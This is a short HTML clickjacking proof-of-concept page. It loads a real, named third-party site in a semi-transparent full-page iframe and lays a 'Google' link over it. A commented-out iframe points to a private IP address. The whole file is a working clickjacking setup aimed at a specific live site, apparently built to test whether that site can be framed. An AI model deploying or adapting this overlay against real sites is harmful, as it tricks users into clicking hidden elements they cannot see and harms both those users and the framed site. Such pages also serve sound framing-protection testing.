<html >
<head>
<title>Click Jacking</title>
</head>
<body>

<style>
iframe { /* iframe */
width:1500px;
height:800px;
position:absolute;
top:0; 
left:0;
filter:alpha;
opacity:0.3;
}
</style>
<div><h1>ClickJacking!!!</h1>

<!-- <iframe src="http://192.168.2.143:1452/"></iframe> -->
<iframe src="http://plantmetabolome.cdri.res.in/"></iframe>

		</div>
<a href="https://www.google.co.in/" style="position:absolute; align:center; z-index:0; padding-top:415px; padding-bottom:25px; padding-right:455px; padding-left:610px;"><font color="Black"><h1>Google</h1>
			<form action="www.google.com">
			</form> </font>
</a>
</body>
</html>
</html>














